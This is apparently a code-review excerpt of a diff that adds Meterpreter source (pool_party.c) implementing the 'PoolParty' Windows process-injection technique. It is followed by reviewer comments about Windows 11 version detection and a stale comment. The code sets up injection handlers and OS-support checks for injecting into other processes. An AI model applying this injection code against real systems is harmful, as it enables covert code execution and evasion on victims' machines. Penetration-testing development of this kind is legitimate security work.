c/meterpreter/source/metsrv/pool_party.c

```diff
@@ -0,0 +1,299 @@
+			//dprintf("[INJECT][inject_via_poolparty][ntdll_init] NtSetInformationWorkerFactory: %p", ntdll->pNtSetInformationWorkerFactory);
+
+			//if (ntdll->pNtQueryInformationWorkerFactory != NULL && ntdll->pNtSetInformationWorkerFactory != NULL) {
+			//	if (poolLifeguard != NULL) {
+			//		poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].isSystemSupported = TRUE;
+			//	}
+			//}
+		}
+	}
+	return ntdll;
+}
+
+POOLPARTY_INJECTOR* GetOrInitPoolParty(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	BOOL bError = FALSE;
+	HANDLE hHeap = GetProcessHeap();
+	bError = (hHeap == NULL);
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
+
+	if (poolLifeguard != NULL) {
+		return poolLifeguard;
+	}
+
+	if (!bError) {
+		poolLifeguard = (POOLPARTY_INJECTOR*)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(POOLPARTY_INJECTOR));
+		bError = poolLifeguard == NULL;
+		
+		if(!bError) {
+			poolLifeguard->init = FALSE;
+			if (ntdll == NULL) {
+				bError = GetOrInitNtDll() == NULL;
+			}
+		}
+
+		if (!bError) {
+			if (dwSourceArch == PROCESS_ARCH_X64) {
+				if (dwDestinationArch == PROCESS_ARCH_X64) {
+					// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].isInjectionSupported = poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].isSystemSupported;
+				}
+				poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].isInjectionSupported = poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].isSystemSupported;
+			}
+		}
+
+		if (!bError) {
+			poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].handler = remote_tp_direct_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].handler = remote_tp_wait_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].handler = worker_factory_start_routine_overwrite;
+			poolLifeguard->init = TRUE;
+		}
+	}
+
+	if (bError && poolLifeguard != NULL) {
+		HeapFree(hHeap, 0, poolLifeguard);
+		poolLifeguard = NULL;
+	}
+	return poolLifeguard;
+};
+
+// For now we support only Windows 10 x64 -> Windows 10 x64
+BOOL supports_poolparty_injection(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	OSVERSIONINFO os = { 0 };
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
+	os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+	NTSTATUS(*pRtlGetVersion)(OSVERSIONINFO * os) = (NTSTATUS(*)(OSVERSIONINFO * os)) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlGetVersion");
+	dprintf("[INJECT][supports_poolparty_injection] RtlGetVersion: %p", pRtlGetVersion);
+	if (!pRtlGetVersion(&os)) {
+		dprintf("[INJECT][supports_poolparty_injection] dwSourceArch: %d dwDestinationArch: %d isWow64: %d", dwSourceArch, dwDestinationArch, isWow64);
+		dprintf("[INJECT][supports_poolparty_injection] os.dwMajorVersion: %d os.dwMinorVersion: %d", os.dwMajorVersion, os.dwMinorVersion);
+		if (os.dwMajorVersion >= 10) {
```

Comment:
Just to be clear, the dwMajorVersion of Windows 11 is `10`, but above you said it only worked on Windows 10.

Reply:
Works on Windows 11 aswell.

Reply:
You may then want to update the comment above that says it only works with Windows 10x64.